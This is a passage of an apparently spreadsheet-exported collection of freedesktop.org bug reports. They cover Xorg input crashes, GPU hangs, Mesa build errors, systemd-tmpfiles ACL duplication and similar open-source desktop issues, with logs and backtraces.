[    16.196] (**) evdev: Logitech Logitech G933 Gaming Wireless Headset: YAxisMapping: buttons 4 and 5
[    16.196] (**) evdev: Logitech Logitech G933 Gaming Wireless Headset: EmulateWheelButton: 4 EmulateWheelInertia: 10 EmulateWheelTimeout: 200
[    16.196] (**) Option config_info udev:/sys/devices/pci0000:00/0000:00:14.0/usb3/3-14/3-14.4/3-14.4:1.3/0003:046D:0A5B.0006/input/input14/event$
[    16.196] (II) XINPUT: Adding extended input device Logitech Logitech G933 Gaming Wireless Headset (type: KEYBOARD id 9)
[    16.196] (**) Option xkb_rules evdev
[    16.196] (EE) BUG: triggered 'if (axnum &gt;= dev-&gt;valuator-&gt;numAxes)'
[    16.196] (EE) BUG: /var/tmp/portage/x11-base/xorg-server-1.18.4/work/xorg-server-1.18.4/Xi/exevents.c:2103 in InitValuatorAxisStruct()
[    16.196] (EE)
[    16.196] (EE) Backtrace:
[    16.196] (EE) 0: /usr/bin/X (xorg_backtrace+0x56) [0x589af6]
[    16.196] (EE) 1: /usr/bin/X (InitValuatorAxisStruct+0x67) [0x51bd17]
[    16.196] (EE) 2: /usr/lib64/xorg/modules/input/evdev_drv.so (0x7f9a08d39000+0x53c5) [0x7f9a08d3e3c5]
[    16.196] (EE) 3: /usr/lib64/xorg/modules/input/evdev_drv.so (0x7f9a08d39000+0x58af) [0x7f9a08d3e8af]
[    16.196] (EE) 4: /usr/lib64/xorg/modules/input/evdev_drv.so (0x7f9a08d39000+0x7653) [0x7f9a08d40653]
[    16.196] (EE) 5: /usr/bin/X (ActivateDevice+0x4a) [0x42a58a]
[    16.196] (EE) 6: /usr/bin/X (0x400000+0x83579) [0x483579]
[    16.196] (EE) 7: /usr/bin/X (0x400000+0x954ab) [0x4954ab]
[    16.196] (EE) 8: /usr/bin/X (0x400000+0x95a93) [0x495a93]
[    16.196] (EE) 9: /usr/bin/X (config_init+0x9) [0x494929]
[    16.196] (EE) 10: /usr/bin/X (InitInput+0xbb) [0x477b8b]
[    16.196] (EE) 11: /usr/bin/X (0x400000+0x39601) [0x439601]
[    16.196] (EE) 12: /lib64/libc.so.6 (__libc_start_main+0xf0) [0x7f9a0f267630]
[    16.196] (EE) 13: /usr/bin/X (_start+0x29) [0x423939]
[    16.196] (EE)
[    16.196] (II) evdev: Logitech Logitech G933 Gaming Wireless Headset: initialized for absolute axes.
[    16.196] (**) Logitech Logitech G933 Gaming Wireless Headset: (accel) keeping acceleration scheme 1
[    16.196] (**) Logitech Logitech G933 Gaming Wireless Headset: (accel) acceleration profile 0
[    16.196] (**) Logitech Logitech G933 Gaming Wireless Headset: (accel) acceleration factor: 2.000
[    16.196] (**) Logitech Logitech G933 Gaming Wireless Headset: (accel) acceleration threshold: 4
Attached is the evemu-describe for this device.
I also have a keyboard that produces this error in the log as well. Should I also attach this to the bug report?</t>
  </si>
  <si>
    <t>john5788</t>
  </si>
  <si>
    <t>HAL-19224</t>
  </si>
  <si>
    <t>input.tablet capabilities is hiding behind wrong check</t>
  </si>
  <si>
    <t>Created attachment 21370
0001-Fix-input.tablet-handling-we-want-ABS_X-ABS_Y-and.patch
input.tablet capabilities assignment is wrong we want to assign it based ont ABS_X ABS_Y and BTN_TOUCH.
The previous check was hiding behind (ABS_X &amp;&amp; !ABS_Y) which (as the comment
suggests) is iffy at best.
Move the check for the BTN_TOUCH bitmask up to the rest of the input.mouse
checking and assign input.tablet accordingly.</t>
  </si>
  <si>
    <t>XORG-22513</t>
  </si>
  <si>
    <t>Driver/XGI</t>
  </si>
  <si>
    <t>Build fixes for XGI (configure.ac changes obsolete includes)</t>
  </si>
  <si>
    <t>I tried to build the XGI driver from Git and ran into various build failures.  Attaching three patches to fix those build failures...</t>
  </si>
  <si>
    <t>MESA-92634</t>
  </si>
  <si>
    <t>gallium's vl_mpeg12_decoder does not work with st/va</t>
  </si>
  <si>
    <t>By curiosity I tried gallium vaapi with ilo aka i965 driver and it crashed.
Not sure if it is a regression or if the root problem is that vl_mpeg12_decoder does not support chunk decoding (i.e. be able to call decode_bitstream many times between begin_frame / end_frame) which is required for st/va to work.
Following patches fixes the crashes but then I can only see blocky green video :)</t>
  </si>
  <si>
    <t>XORG-22756</t>
  </si>
  <si>
    <t>nouveau_fence.c kernel BUG and recursive faults</t>
  </si>
  <si>
    <t>Created attachment 27647
Xorg log
Nouveau KMS enabled and working fine NV28 card.
DRM modules from nouveau/linux-2.6 git v2.6.31-rc2-65-g7525cc6 branch master-compat commit 7525cc6ddc45772f78aa40fe0a767f512f2ae1ed Clarify nouveau/DEPENDS file.. This branch is up-to-date with master branch commit drm/nouveau: allow celcius on nv20. The host kernel is 2.6.28-gentoo-r5.
When trying to start X screen blinks goes black kernel hits BUGs but the machine does not hang. SysRq can unlock the keyboard but I do not get the console back screen stays black. The kernel recommends a reboot after the recursive fault.
Attaching X.org log (nothing really interesting) and the kernel log with drm debug=1 except all debug messages starting in nouveau_hw.h disabled (they overflow the kernel message buffer and I hear they make I2C/DDC fail).
I'm guessing a way to reproduce this would be to remove e.g. NVxxTCL object from the list of allowed grobjs and then starting X. Missing NV11TCL was how I first hit this kind of bug but adding that did not fix everything. Probably something wrong in the nouveau DRM error paths.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-8453</t>
  </si>
  <si>
    <t>Keyboard configuration for Sorani Kurdish (Arabic)</t>
  </si>
  <si>
    <t>The Kurdish language is written in modified Arabic Latin or Cyrillic scripts
depending on the dialect.  The dialects are mutually intelligible orally but
most Kurdish speakers know only one writing system.
xkb currently has a keyboard layout for writing the Latin-based Kurmanji dialect
spoken in Syria and Turkey (see Bug 6159).  However it needs a keyboard layout
for the Sorani dialect of Kurdish which is spoken in Iran and Iraq and uses a
modified Arabic alphabet.  The existing Arabic and Farsi xkb layouts are not
appropriate for writing Sorani Kurdish.
The most common Sorani Kurdish keyboard layout I have encountered can be seen at
.  See
also  for a Unicode table of the
Kurdish alphabet.</t>
  </si>
  <si>
    <t>psychonaut</t>
  </si>
  <si>
    <t>XORG-22474</t>
  </si>
  <si>
    <t>patch: GPU hangs playing movie in portrait mode</t>
  </si>
  <si>
    <t>When the screen is rotated the calculation of scan lines for
MI_LOAD_SCAN_LINES_INCL must apply the f_framebuffer_to_crtc
transformation. Otherwise the GPU will hang waiting for a line
that is not valid.
Testing in all four rotations.
The patch assumes that the scan lines returned from the transformation
are always valid for the crtc.
This patch has only been tested on a single head configuration.</t>
  </si>
  <si>
    <t>DRI-96618</t>
  </si>
  <si>
    <t>include headers that define major/minor/makedev funcs</t>
  </si>
  <si>
    <t>background can be found in bug 94231</t>
  </si>
  <si>
    <t>SYSTEMD-89202</t>
  </si>
  <si>
    <t>systemd-tmpfiles adds ACLs multiple times</t>
  </si>
  <si>
    <t>Version 219 gained support for ACLs in tmpfiles.d. But this isn't idempotent it appends identical ACLs with each run. This isn't that important for /run/ but problematic for persistant directories like /var/log/journal.
If you run 
  sudo ./systemd-tmpfiles --create `pwd`/tmpfiles.d/systemd.conf
in the built tree (which is probably the most convenient reproducer for developers) 3 times you get
$ getfacl /run/log/journal/5aa2ce6f17f156f9099864b6546dc1b0/
# file: run/log/journal/5aa2ce6f17f156f9099864b6546dc1b0/
# owner: root
# group: systemd-journal
# flags: -s-
user::rwx
group::r-x
group:adm:r-x
group:adm:r-x
group:adm:r-x
mask::r-x
other::---
default:user::rwx
default:group::r-x
default:group:adm:r-x
default:group:adm:r-x
default:group:adm:r-x
default:mask::r-x
default:other::---
I. e. the adm ACLs are repeated three times (notice that I left out the wheel ones as that group doesn't exist in Debian).
These duplicate entries not only pile up on persistant directories like /var over time they also break the setfacl command line tool which doesn't like them:
$ sudo setfacl -R -nm g:adm:rxd:g:adm:rx /run/log/journal/5aa2ce6f17f156f9099864b6546dc1b0
setfacl: /run/log/journal/5aa2ce6f17f156f9099864b6546dc1b0: Malformed access ACL `user::rwxgroup::r-xgroup:adm:r-xgroup:adm:r-xgroup:adm:r-xmask::r-xother::---': Duplicate entries at entry 4
setfacl: /run/log/journal/5aa2ce6f17f156f9099864b6546dc1b0/system.journal: Malformed access ACL `user::rwxgroup::r--group:adm:r-xgroup:adm:r-xgroup:adm:r-xmask::r-xother::---': Duplicate entries at entry 4</t>
  </si>
  <si>
    <t>CAIRO-9846</t>
  </si>
  <si>
    <t>Ignore glyph-not-found kind of errors</t>
  </si>
  <si>
    <t>poppler 0.5.4 (plus cairo-1.3.12) are not able to properly display http://www.abm.uu.se/evahw/coupon.pdf.
xpdf and Adobe 7 display it fine.</t>
  </si>
  <si>
    <t>SYSTEMD-70027</t>
  </si>
  <si>
    <t>wish - after systemd releases hotfixes would get a tag</t>
  </si>
  <si>
    <t>I tried to backport some fixes doing wild guesses (as non developer).
My picks where rightly rejected:
https://bugs.gentoo.org/show_bug.cgi?id=485302
because I stumbled picking a patch being a further development and having ignored its predecessor:
https://bugs.freedesktop.org/show_bug.cgi?id=70020
If there are errors of a release every user will encounter 
I would appreciate to see a Summary like:
fix207 - ....
Yet - Gnome38 depending on Systemd (I really don't know what the fuzz all about Gnome I use Kde) - many more users got their setup depending on Systemd. Thus there is a bigger impact of bugs than before ...</t>
  </si>
  <si>
    <t>CONSOLEKIT-22178</t>
  </si>
  <si>
    <t>port to PolicyKit 1.0</t>
  </si>
  <si>
    <t>Created attachment 26590
patch
I'll attach the patch that we are using in Fedora.</t>
  </si>
  <si>
    <t>XORG-87585</t>
  </si>
  <si>
    <t>2D Acceleration at least for Qt3/KDE3 tree widgets broken</t>
  </si>
  <si>
    <t>Created attachment 111169
xorg server log
I recently changed my graphics card from a Radeon HD 6670 to a Radeon R7 260X.
With this change some KDE3/Qt3 software I still use became partly unusable because of extremely slow rendering of their tree view widgets - the email folder list in Kmail 1.9.10 folder/project view in Quanta plus (and Quanta isn't replacable there's no Qt4 version) ... and it's neither user nor window manager specific. Tried different users and several window managers / desktop environments to run the programs.
Example lags for Kmail: it takes about 35 seconds until the content of a a newly chosen email folder shows up. 10 seconds to fold 40 seconds to unfold a folder with its subfolders.
The problem vanishes if I use the framebuffer driver with X.org. Everything works fine then - though at generally lower speed of course.
The most apparent change that came along with the change of the graphics card is the change in 2D acceleration architecture. The HD 6670 was using EXA the R7 260X is using glamor - and unfortunately I can not switch back to EXA with this card. So I suppose glamor is the component that is causing this trouble.
Software Versions:
Linux 3.18.0
Qt3 3.3.8c
xorg-x11-server 7.6 / 1.16.2
Mesa 10.4.0</t>
  </si>
  <si>
    <t>kilgus</t>
  </si>
  <si>
    <t>PACKAGEKIT-19884</t>
  </si>
  <si>
    <t>Make browser plugin directory configurable</t>
  </si>
  <si>
    <t>Right now in openSUSE we have to patch contrib/browser-plugin/Makefile.am like this:
-plugindir=$(libdir)/mozilla/plugins
+plugindir=$(libdir)/browser-plugins
It'd be nice to be able to set the plugin directory either with an environment variable or a configure flag. Totem uses an environment variable for the totem plugin it seems.</t>
  </si>
  <si>
    <t>DRI-83262</t>
  </si>
  <si>
    <t>Radeon DPM re-clocking fails after resume from suspend</t>
  </si>
  <si>
    <t>I noticed that when I suspend my machine resume and then play openGL games like Dota 2 or L4D2 that the performance is not as good as a fresh boot. The framerates are reduced and the overall experience is less smooth. I am using the open source radeon graphics drivers with a Saphire R7 260X and Arch Linux 64-bit with Cinnamon desktop. I had a similar issue with my HD6670 graphics card. 
It seems like dpm (dynamic power management) is not enabled after resuming from suspend. When running `cat /sys/kernel/debug/dri/64/radeon_pm_info` my system should move from mclk: 15000 to mclk:150000 when running Dota 2 or L4D2 but this does not happen after I have resumed from suspend unless I reboot.
I have had this issue since at least the 3.14 kernel and still have this issue with the the latest stable 3.16.1 kernel xf86-video-ati 1:7.4.0-3 and mesa 10.2.6-1.</t>
  </si>
  <si>
    <t>harlemsquirrel</t>
  </si>
  <si>
    <t>DRI-58272</t>
  </si>
  <si>
    <t>Rv670 AGP drm-next ttm errors</t>
  </si>
  <si>
    <t>Created attachment 71476
errors in kern log with dma
I haven't had time to test latest drm-next but will post this now as may be AFK tomorrow.
After finding a place on mesa where etqw seems OK with drm-fixes I am getting errors with drm-next.
On yesterdays head + the wb patch I got attachment 1.
With the tree reset to before the dma changes which required the patch -
drm/ttm: remove no_wait_reserve v3
I got attachment 2
the last lines repeating for 400k lines and the log also getting filled with junk.</t>
  </si>
  <si>
    <t>TELEPATHY-23344</t>
  </si>
  <si>
    <t>Provide API for Debug</t>
  </si>
  <si>
    <t>I haven't incorporated Debug codegen into telepathy-glib yet. Please do so.
On the service side we need something similar to Gabble's GabbleDebugger it might as well go straight in at the same time as the codegen. Perhaps call it TpDebugSender.
On the client side we need a TpProxy subclass onto which to hook codegen perhaps call it TpDebugReceiver.
My wip-debug branch is totally untested but is probably a good starting point.</t>
  </si>
  <si>
    <t>LIBREOFFICE-49394</t>
  </si>
  <si>
    <t>UI: MAC OS X scroll thumb stops being draggable</t>
  </si>
  <si>
    <t>Problem description: 
Scroll thumb stops being draggable.
Steps to reproduce:
1. Fill column A with a large number of values - eg open a CSV file with 1 million rows
2. Column B fill the first row and then scroll down to select the last row. Select Edit-&gt;Fill Down.
3. Try to drag the scroll thumb up to go back to the first row. The scroll thumb no longer works.
Current behavior:
Broken.
Expected behavior:
Scrolling.
Platform (if different from the browser): 
Browser: Mozilla/5.0 (Macintosh Intel Mac OS X 10_7_2) AppleWebKit/535.19 (KHTML like Gecko) Chrome/18.0.1025.165 Safari/535.19</t>
  </si>
  <si>
    <t>n574sp</t>
  </si>
  <si>
    <t>TELEPATHY-13943</t>
  </si>
  <si>
    <t>UpdateMemberships scenario for Memberships = ~PENDING | REVERSE</t>
  </si>
  <si>
    <t>The current UpdateMemberships scenario is unable to handle the case where we add a contact to the REVERSE list then remove it from the PENDING list in fact we need this to be able to accept a contact and we are only allowed to add to the REVERSE list if the contact is in the PENDING list.
Reversing the order of the operations won't work as this will make the Block/Unblock scenarios not work.</t>
  </si>
  <si>
    <t>LIBREOFFICE-72498</t>
  </si>
  <si>
    <t>Please update German dictionary for AT CH DE</t>
  </si>
  <si>
    <t>There are new German (de-DE de-AT de-CH) dictionary extensions available (which are not yet in LO 4.2 Beta2). Please update the dictionaries for LibreOffice 4.2:
http://extensions.libreoffice.org/extension-center/german-de-de-frami-dictionaries
http://extensions.libreoffice.org/extension-center/german-de-ch-frami-dictionaries
http://extensions.libreoffice.org/extension-center/german-de-at-frami-dictionaries
Thanks!</t>
  </si>
  <si>
    <t>MESA-93087</t>
  </si>
  <si>
    <t>[BXT CTS] Conformance not yet achieved for BXT-P</t>
  </si>
  <si>
    <t>The following CTS tests fail image comparison:
es3-cts.shaders.uniform_block.single_nested_struct_array.per_block_buffer_shared_instance_array
es3-cts.shaders.uniform_block.single_nested_struct_array.per_block_buffer_std140_instance_array
es3-cts.shaders.uniform_block.single_nested_struct_array.single_buffer_packed_instance_array
es3-cts.shaders.uniform_block.single_nested_struct_array.per_block_buffer_packed_instance_array
es3-cts.shaders.uniform_block.single_nested_struct_array.single_buffer_std140_instance_array
es3-cts.shaders.uniform_block.single_nested_struct_array.single_buffer_shared_instance_array
Kaveh asked me to generate this list in bugzilla so Neil can take a look at the failures.</t>
  </si>
  <si>
    <t>MESA-94109</t>
  </si>
  <si>
    <t>Sometimes when taking Chrome out of full-screen mode the whole system freezes and needs a cold reboot</t>
  </si>
  <si>
    <t>Created attachment 121703
Xorg.0.log file and anything under /var/logs that contains i965
Machine specs:
uname -m: x86_64
uname -r: 4.2.0-27-generic
Distro: Ubuntu 15.10
Machine: Lenovo ThinkCentre M900 with Skylake Core i7 6700
Chipset: Q170
Display connector: DP 1.2
---
I added drm.debug=0x1e log_buf_len=1M to Grub's config (/etc/default/grub):
GRUB_DEFAULT=0
GRUB_HIDDEN_TIMEOUT=0
GRUB_HIDDEN_TIMEOUT_QUIET=true
GRUB_TIMEOUT=10
GRUB_DISTRIBUTOR=`lsb_release -i -s 2&gt; /dev/null || echo Debian`
GRUB_CMDLINE_LINUX_DEFAULT=quiet splash drm.debug=0x1e log_buf_len=1M
GRUB_CMDLINE_LINUX=drm.debug=0x1e log_buf_len=1M
but running cat /sys/class/drm/card0/error showed no errors:
   no error state collected
---
Reproducability: Cannot be reproduced all the time but I've seen quite a few similar bug reports associated with Intel GPUs:
* http://ubuntuforums.org/showthread.php?t=2113179
* http://unix.stackexchange.com/questions/91912/chrome-freezes-ubuntu-13-04
However if I use Chrome as my main browser it at least happens one per day if not two or three times per day.
---
Installed libva libraries:
* libva-drm1/unknownnow 1.6.1-1 amd64 [installed]
* libva-egl1/unknownnow 1.6.1-1 amd64 [installed]
* libva-glx1/unknownnow 1.6.1-1 amd64 [installed]
* libva-tpi1/unknownnow 1.6.1-1 amd64 [installed]
* libva-wayland1/unknownnow 1.6.1-1 amd64 [installed]
* libva-x11-1/unknownnow 1.6.1-1 amd64 [installedautomatic]
* libva1/unknownnow 1.6.1-1 amd64 [installed]
* libvariable-magic-perl/wilynow 0.58-1 amd64 [installed]
Couldn't find any vaapi packages but here are some potentially related packages:
* i965-va-driver/unknownnow 1.6.1-1 amd64 [installed]
* java-common/wilynow 0.52 all [installedautomatic]
* libva-drm1/unknownnow 1.6.1-1 amd64 [installed]
* libva-egl1/unknownnow 1.6.1-1 amd64 [installed]
* libva-glx1/unknownnow 1.6.1-1 amd64 [installed]
* libva-tpi1/unknownnow 1.6.1-1 amd64 [installed]
* libva-wayland1/unknownnow 1.6.1-1 amd64 [installed]
* libva-x11-1/unknownnow 1.6.1-1 amd64 [installedautomatic]
* libvdpau-va-gl1/wilynow 0.3.4-3 amd64 [installed]
* va-driver-all/unknownnow 1.6.1-1 amd64 [installed]
* vdpau-va-driver/wilynow 0.7.4-4 amd64 [installedautomatic]
Any package with intel in the package name:
* intel-gpu-tools/unknownnow 1.12-1 amd64 [installed]
* intel-linux-graphics-installer/unknownnow 1.2.1-0intel2 amd64 [installed]
* intel-microcode/wilynow 3.20150121.1 amd64 [installed]
* libdrm-intel1/wilynow 2.4.64-1 amd64 [installedautomatic]
* xserver-xorg-video-intel/wilynow 2:2.99.917+git20150808-0ubuntu4 amd64 [installedautomatic]
Mesa packages:
* libegl1-mesa/wilynow 11.0.2-1ubuntu4 amd64 [installedautomatic]
* libgl1-mesa-dri/wilynow 11.0.2-1ubuntu4 amd64 [installedautomatic]
* libgl1-mesa-glx/wilynow 11.0.2-1ubuntu4 amd64 [installedautomatic]
* libglapi-mesa/wilynow 11.0.2-1ubuntu4 amd64 [installedautomatic]
* libgles1-mesa/wilynow 11.0.2-1ubuntu4 amd64 [installedautomatic]
* libgles2-mesa/wilynow 11.0.2-1ubuntu4 amd64 [installedautomatic]
* libglu1-mesa/wilynow 9.0.0-2 amd64 [installedautomatic]
* libwayland-egl1-mesa/wilynow 11.0.2-1ubuntu4 amd64 [installedautomatic]
libdrm packages:
* libdrm-amdgpu1/wilynow 2.4.64-1 amd64 [installedautomatic]
* libdrm-intel1/wilynow 2.4.64-1 amd64 [installedautomatic]
* libdrm-nouveau2/wilynow 2.4.64-1 amd64 [installedautomatic]
* libdrm-radeon1/wilynow 2.4.64-1 amd64 [installedautomatic]
* libdrm2/wilynow 2.4.64-1 amd64 [installedautomatic]
If anything else is needed please let me know. 
If need be you can also remotely login to my machine.</t>
  </si>
  <si>
    <t>behrangsa</t>
  </si>
  <si>
    <t>DBUS-8318</t>
  </si>
  <si>
    <t>uscore_to_wincaps crashes</t>
  </si>
  <si>
    <t xml:space="preserve">uscore_to_wincaps doesn't check the input parameters uscore it appears to be 
NULL in some cases:
#0  uscore_to_wincaps (uscore=0x0) at dbus-gobject.c:64
#1  0x00140ce2 in gerror_to_dbus_error_message 
(object_info=Variable object_info is not available.
) at dbus-gobject.c:842
#2  0x00141cf3 in gobject_message_function (connection=0x8b51d78 
message=0x8b53498 user_data=0x8b50240) at dbus-gobject.c:1219
#3  0x05766af9 in _dbus_object_tree_dispatch_and_unlock (tree=0x8b51bd8 
message=0x8b53498) at dbus-object-tree.c:842
#4  0x0575132c in dbus_connection_dispatch (connection=0x8b51d78) at 
dbus-connection.c:3820
#5  0x0013d26d in message_queue_dispatch (source=0x8b52210 callback=0 
user_data=0x0) at dbus-gmain.c:113
#6  0x00514ffd in IA__g_main_context_dispatch (context=0x8b515d8) at 
gmain.c:1916
#7  0x0051828f in g_main_context_iterate (context=0x8b515d8 block=1 
dispatch=1 self=0x8b50550) at gmain.c:2547
#8  0x00518639 in IA__g_main_loop_run (loop=0x8b50988) at gmain.c:2751
#9  0x08051be3 in sniffer_dbus_main () at dbus/wireshark-dbus-sniffer.c:229
#10 0x0804fcc0 in main (argc=Cannot access memory at address 0x50
Here is the function declaration that has trigger the crash:
      &lt;annotation name=org.freedesktop.DBus.GLib.CSymbol 
value=sniffer_get/&gt;
    </t>
  </si>
  <si>
    <t>frederic.heem</t>
  </si>
  <si>
    <t>DRI-91495</t>
  </si>
  <si>
    <t>Periodically video will freeze for no specific reason. Sometimes putting '[drm:i915_hangcheck_elapsed [i915]] *ERROR* Hangcheck timer elapsed... render ring idle' in syslog</t>
  </si>
  <si>
    <t>Created attachment 117428
Xorg GDB backtrace output
Video will freeze for no specific reason and an no particular time interval. Although it does seem to happen most often when using Facebook or Twitter with Firefox the freeze today was when I was going to print a webpage from within Firefox. When the freeze happens all other background processes such as Fetchmail Procmail Postfix and others operate as normal. The freeze today took place at 15:36:03 CDT and I've noticed in my Syslog that at 16:02:28 there was this entry:
Jul 28 16:02:28 localhost kernel: [793861.820048] [drm:i915_hangcheck_elapsed [i915]] *ERROR* Hangcheck timer elapsed... render ring idle
I was able to SSH into the desktop via my tablet and did a reboot from there at 16:10. Running 'cat /sys/class/drm/card0/error showed an output of no error state collected.
System Info:
Ubuntu 14.04.2 LTS
Dell Optiplex 780
Kernel 4.0.0-997-generic
I'm also attaching the GDB output of 'backtrace full' for Xorg and Gnome-Shell</t>
  </si>
  <si>
    <t>cpollock</t>
  </si>
  <si>
    <t>XORG-66891</t>
  </si>
  <si>
    <t>Input/wacom</t>
  </si>
  <si>
    <t>Add xorg rule for ISD-V4 tablet</t>
  </si>
  <si>
    <t>Created attachment 82404
Add ISD-V4
Please add the ISD-V4 tablet to the default xorg rules. Many integrated tablets use it but the Wacom driver ignores them.
Ubuntu/Mint have such a rule (see attached patch) and on there they will use the correct driver out-of-the-box.</t>
  </si>
  <si>
    <t>XORG-6803</t>
  </si>
  <si>
    <t>segfault with EXA in non-mergedfb dual-screen mode</t>
  </si>
  <si>
    <t>Using the radeon driver in traditional dual-screen mode (not merged fb) the X
server segfaults when the 2nd head is setup to use EXA.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-17541</t>
  </si>
  <si>
    <t>Requesting git repo for xorg/app/xscope</t>
  </si>
  <si>
    <t>Please create a git repository for xscope under xorg/app.
The initial repository contents can be cloned from:
git://people.freedesktop.org/~alanc/xscope</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-8196</t>
  </si>
  <si>
    <t>Request for CVS account</t>
  </si>
  <si>
    <t>As per http://lists.freedesktop.org/archives/poppler/2006-September/002147.html
I'm applying for CVS account for poppler project.
Name: Krzysztof Kowalczyk
E-mail: kkowalczyk@gmail.com
Preferred account name 1: kjk
Preferred account name 2: kkowalczyk
PGP and SSH keys attached.</t>
  </si>
  <si>
    <t>kkowalczyk</t>
  </si>
  <si>
    <t>XORG-3914</t>
  </si>
  <si>
    <t>ATI Mach64 locks up sparc post 6.8.99.3</t>
  </si>
  <si>
    <t>Starting with 6.8.99.5 and on I've noticed my system locks up (even ignores
L1-A) when starting the X server with the ati display device.
6.8.2 works
6.8.99.3 works
6.8.99.5 doesn't
6.8.99.8 doesn't
6.8.99.14 doesn't
I'm investigating 6.8.99.4 now.
0000:01:02.0 VGA compatible controller: ATI Technologies Inc 3D Rage Pro 215GP
(rev 5c)
(==) ATI(0): Chipset:  ati.
(**) ATI(0): Depth 24 (--) framebuffer bpp 32
(II) ATI(0): BIOS Data:  BIOSSize=0x0000 ROMTable=0x0000.
(II) ATI(0): BIOS Data:  ClockTable=0x0000 FrequencyTable=0x0000.
(II) ATI(0): BIOS Data:  LCDTable=0x0000 LCDPanelInfo=0x0000.
(II) ATI(0): BIOS Data:  VideoTable=0x0000 HardwareTable=0x0000.
(II) ATI(0): BIOS Data:  I2CType=0x00 Tuner=0x00 Decoder=0x00 Audio=0x0F.
(--) ATI(0): ATI 3D Rage Pro graphics controller detected.
(--) ATI(0): Chip type 4750 GP version 4 foundry UMC class 0 revision 0x01.
(--) ATI(0): PCI bus interface detected.
(--) ATI(0): ATI Mach64 adapter detected.
cpu             : TI UltraSparc IIi (Sabre)
fpu             : UltraSparc IIi integrated FPU
promlib         : Version 3 Revision 25
prom            : 3.25.2
type            : sun4u
ncpus probed    : 1
ncpus active    : 1
Cpu0Bogo        : 876.54
Cpu0ClkTck      : 000000001a39de00
MMU Type        : Spitfire</t>
  </si>
  <si>
    <t>eradicator</t>
  </si>
  <si>
    <t>TELEPATHY-22467</t>
  </si>
  <si>
    <t>Merge support for Google Video</t>
  </si>
  <si>
    <t>I think my updated version of Sjoerd's google-video branch is ready for merging given review.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-21983</t>
  </si>
  <si>
    <t>duplicating of LEDs</t>
  </si>
  <si>
    <t>I use
xorg
evdev
usru(winkeys)
grp:caps_toggle
grp_led:scroll
in hal for keyboard config. When I switch laout with Caps Lock two LEDS are switched on - Num Lock (which I want to be switched on) and Caps Lock (I don't want this!) I found in rules/evdev that
grp_led:scroll        =       +ledscroll(group_lock)
grp:caps_toggle       =       +ledcaps(group_lock)
So I think that ledscroll(group_lock) must replace ledcaps(group_lock)
PS. This bug is longstanding and currently I see it in xkeyboard-config-1.5</t>
  </si>
  <si>
    <t>yaroslav.isakov</t>
  </si>
  <si>
    <t>SWFDEC-10333</t>
  </si>
  <si>
    <t>Avoid automagic dependencies via configure</t>
  </si>
  <si>
    <t>http://www.gentoo.org/proj/en/qa/automagic.xml
Trivial patch to enable/disable via configure mad and ffmpeg support on swfdec.</t>
  </si>
  <si>
    <t>mikel</t>
  </si>
  <si>
    <t>MESA-92052</t>
  </si>
  <si>
    <t>nir/nir_builder.h:79: error: expected primary-expression before â€˜.â€™ token</t>
  </si>
  <si>
    <t>mesa: 99b1f4751f97631011b64fabcb57acf6beae01ac (master 11.1.0-devel)
  CXX    nir/nir_lower_samplers.lo
In file included from nir/nir_lower_samplers.cpp:27:
nir/nir_builder.h: In function â€˜nir_ssa_def* nir_imm_float(nir_builder* float)â€™:
nir/nir_builder.h:79: error: expected primary-expression before â€˜.â€™ token
nir/nir_builder.h:79: warning: extended initializer lists only available with -std=c++0x or -std=gnu++0x
nir/nir_builder.h: In function â€˜nir_ssa_def* nir_imm_vec4(nir_builder* float float float float)â€™:
nir/nir_builder.h:86: error: expected primary-expression before â€˜.â€™ token
nir/nir_builder.h:86: warning: extended initializer lists only available with -std=c++0x or -std=gnu++0x
nir/nir_builder.h: In function â€˜nir_ssa_def* nir_imm_int(nir_builder* int)â€™:
nir/nir_builder.h:93: error: expected primary-expression before â€˜.â€™ token
nir/nir_builder.h:93: warning: extended initializer lists only available with -std=c++0x or -std=gnu++0x</t>
  </si>
  <si>
    <t>SYNCEVOLUTION-52697</t>
  </si>
  <si>
    <t>networkmanager 0.9 API has changed (network state)</t>
  </si>
  <si>
    <t xml:space="preserve">
---- Reported by jku@linux.intel.com 2011-06-17 08:22:26 +0000 ----
NetworkManager 0.9 implements the same org.freedesktop.NetworkManager API but has completely changed the State property values.
NM &lt;= 0.8:
 NM_STATE_UNKNOWN = 0
 NM_STATE_ASLEEP = 1
 NM_STATE_CONNECTING = 2
 NM_STATE_CONNECTED = 3
 NM_STATE_DISCONNECTED = 4
NM == 0.9:
 NM_STATE_UNKNOWN = 0
 NM_STATE_ASLEEP = 10
 NM_STATE_DISCONNECTED = 20
 NM_STATE_DISCONNECTING = 30
 NM_STATE_CONNECTING = 40
 NM_STATE_CONNECTED_LOCAL = 50
 NM_STATE_CONNECTED_SITE = 60
 NM_STATE_CONNECTED_GLOBAL = 70
I'll write a patch for setting the HTTP presence value to TRUE when NM state is [0 3 50 60 70]. That should cover it:  0 and 50 (link local connection) are probably not going to work but better to be conservative here.
---- Additional Comments From jku@linux.intel.com 2011-06-17 10:15:58 +0000 ----
I found another bug in the NM status code. Fixes are in jku branch -- do not merge the whole branch though it has work-in-progress webdav commits as well.
Let me know if you'd rather have patches or another branch...
commit cde0ef80b0430a4dbc41545f78dc55182a720dbb
Author: Jussi Kukkonen 
Date:   Fri Jun 17 13:06:37 2011 +0300
    Specify interface name in NM DBus GetProperty call
    NetworkManager 0.9 is more strict about the call arguments: it seems
    newer dbus-glib requires that the interface name is specified otherwise
    there is an AccessDenied error.
commit ac7d0e69147e98264e4c54081823b7e2a2f7aed7
Author: Jussi Kukkonen 
Date:   Fri Jun 17 11:44:48 2011 +0300
    Update NetworkManager Status-handling to 0.9 API
    NetworkManager 0.9 changes the values of
    org.freedesktop.NetworkManager.Status property. Fortunately the new
    and old values are not in conflict.
    Commit also starts setting presence to false only when we know this
    should happen (and not the other way around): It's better to fail
    this way than prevent user from syncing if things like this happen.
---- Additional Comments From patrick.ohly@intel.com 2011-06-17 10:41:22 +0000 ----
Thanks for the patches merged.
---- Additional Comments From peter.j.zhu@intel.com 2011-06-17 18:53:36 +0000 ----
sr 21101 accepted
--- Bug imported by patrick.ohly@gmx.de 2012-07-29 20:36 UTC  ---
This bug was previously known as _bug_ 19470 at https://bugs.meego.com/show_bug.cgi?id=19470
</t>
  </si>
  <si>
    <t>XORG-59113</t>
  </si>
  <si>
    <t>[IVB DP] Banded colors/reduced depth over Thunderbolt on Mac Mini Server 2012 (62)</t>
  </si>
  <si>
